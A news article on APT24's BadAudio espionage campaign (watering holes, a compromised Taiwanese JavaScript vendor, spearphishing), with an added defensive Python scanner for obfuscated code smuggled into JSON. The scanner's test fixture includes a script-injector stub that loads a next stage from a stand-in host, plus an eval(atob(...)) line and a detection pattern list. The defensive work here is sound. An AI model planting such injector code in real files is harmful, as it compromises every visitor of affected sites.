Google Exposes BadAudio Malware Used in APT24 Espionage Campaigns
China-linked APT24 hackers have been using a previously undocumented malware family called BadAudio in a three-year espionage campaign that recently shifted to more sophisticated delivery methods.
Since 2022, the malware has been delivered to victims through multiple methods that include spearphishing, supply-chain compromise, and watering hole attacks.
From November 2022 until at least September 2025, APT24 compromised more than 20 legitimate public websites, belonging to a range of different organizations, and injected malicious JavaScript that singled out visitors of interest. The campaign targeted Windows systems exclusively.
Researchers at Google Threat Intelligence Group (GTIG) say that the script fingerprinted visitors who qualified as targets and loaded a fake software update pop-up to lure them into downloading BadAudio.
Starting in July 2024, APT24 compromised, on several occasions, a digital marketing company in Taiwan that provides JavaScript libraries to client websites.
In that intrusion, the attackers injected malicious JavaScript into a widely used library that the firm distributed, and registered a domain name that impersonated a legitimate content delivery network (CDN). A single upstream compromise of this kind let the attacker reach more than 1,000 domains at once.
From late 2024 until July 2025, APT24 repeatedly compromised the same marketing firm, this time injecting malicious, obfuscated JavaScript into a modified JSON file that a separate JavaScript file from the same vendor loaded.
Once executed, the injected script fingerprinted each website visitor and sent a base64-encoded report to the attackers' server, which then decided whether to reply with the URL of the next stage.
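The supply-chain trick in the two paragraphs above relies on a vendor's loader script consuming a JSON file that should only ever carry configuration data. A defender who mirrors or proxies third-party assets can check for exactly that abuse: string values in the JSON that parse as JavaScript, either in the clear or wrapped in base64. The scanner below is an added example written for this article, not code from Google, BleepingComputer, the Taiwanese vendor or APT24. The two JSON documents it scans are constructed inline, the execution-primitive patterns and the 40-character base64 threshold are the author's assumptions, and no real domain is referenced.

```python
"""Flag JSON string values that look like smuggled, obfuscated JavaScript.

Added example for the APT24/BadAudio article. A configuration JSON file loaded
by a vendor's JavaScript should never contain strings that are themselves code,
so any string carrying JavaScript execution primitives, directly or inside a
base64 blob, is worth a closer look. Sample inputs are constructed, not real.
"""
import base64
import binascii
import json
import math
import re
from typing import Any, Iterator, List, Optional, Tuple

# Execution primitives that have no business in a configuration file
# (heuristic list chosen for this example, not a vendor's or Google's list).
CODE_PATTERNS = re.compile(
    r"\b(eval|Function|atob|setTimeout|setInterval)\s*\("
    r"|String\.fromCharCode"
    r"|document\.(write|createElement|appendChild)"
    r"|\.(src|innerHTML)\s*="
    r"|<script\b"
)

# Candidate base64 blobs: 40+ chars of the base64 alphabet plus optional padding.
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
ENTROPY_THRESHOLD = 5.0  # bits per byte; assumed cut-off for "opaque" data


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def walk_strings(node: Any, path: str = "$") -> Iterator[Tuple[str, str]]:
    """Yield (json_path, value) for every string in a parsed JSON tree."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield from walk_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for idx, value in enumerate(node):
            yield from walk_strings(value, f"{path}[{idx}]")


def classify_string(value: str) -> Optional[str]:
    """Return a reason if `value` looks like smuggled code, else None."""
    if CODE_PATTERNS.search(value):
        return "contains JavaScript execution primitive"
    if B64_BLOB.match(value):
        try:
            decoded = base64.b64decode(value, validate=True)
        except (ValueError, binascii.Error):
            return None
        text = decoded.decode("utf-8", errors="ignore")
        if CODE_PATTERNS.search(text):
            return "base64-wrapped JavaScript execution primitive"
        if shannon_entropy(decoded) > ENTROPY_THRESHOLD:
            return "high-entropy opaque blob (review manually)"
    return None


def scan_json_text(text: str) -> List[dict]:
    """Parse `text` as JSON and return one finding per suspicious string."""
    findings = []
    for path, value in walk_strings(json.loads(text)):
        reason = classify_string(value)
        if reason:
            findings.append({"path": path, "reason": reason})
    return findings


# Constructed sample 1: an ordinary vendor configuration file.
BENIGN_JSON = json.dumps({
    "version": "3.2.1",
    "cdn": "https://static.example.com/lib/",
    "features": {"lazyload": True, "timeout_ms": 3000},
    "locales": ["en", "zh-TW"],
})

# Constructed sample 2: the same file with a clear-text loader stub in one
# field and a base64-wrapped script injector hidden in an "asset" entry.
_STAGE2_STUB = (
    "var s=document.createElement('script');"
    "s.src='https://cdn-lookalike.invalid/next.js';"
    "document.head.appendChild(s);"
)
MALICIOUS_JSON = json.dumps({
    "version": "3.2.1",
    "config": {"tracking": "(function(){eval(atob(window.__p))})()"},
    "assets": [
        {"id": "logo", "data": "iVBORw0KGgo="},  # too short to be a candidate blob
        {"id": "theme", "data": base64.b64encode(_STAGE2_STUB.encode()).decode()},
    ],
})

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_JSON), ("malicious", MALICIOUS_JSON)):
        for finding in scan_json_text(doc) or [{"path": "-", "reason": "clean"}]:
            print(f"{label:9s} {finding['path']:22s} {finding['reason']}")
```

Run against the mirrored copy of each third-party JSON your pages load, and treat any "execution primitive" finding as a probable compromise of the vendor rather than a false positive to tune away: legitimate configuration data does not need `eval`, `atob`, or `document.createElement`. The entropy branch only asks for manual review, since compressed images or fonts legitimately ride in JSON as base64.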
In parallel, from August 2024, APT24 ran spearphishing operations that delivered BadAudio using emails impersonating animal rescue organizations as lures.
In some variants of these attacks, APT24 distributed the malware from legitimate cloud services such as Google Drive and OneDrive instead of its own servers. Google says, however, that many of these attempts were detected and the messages landed in recipients' spam folders.
Source: BleepingComputer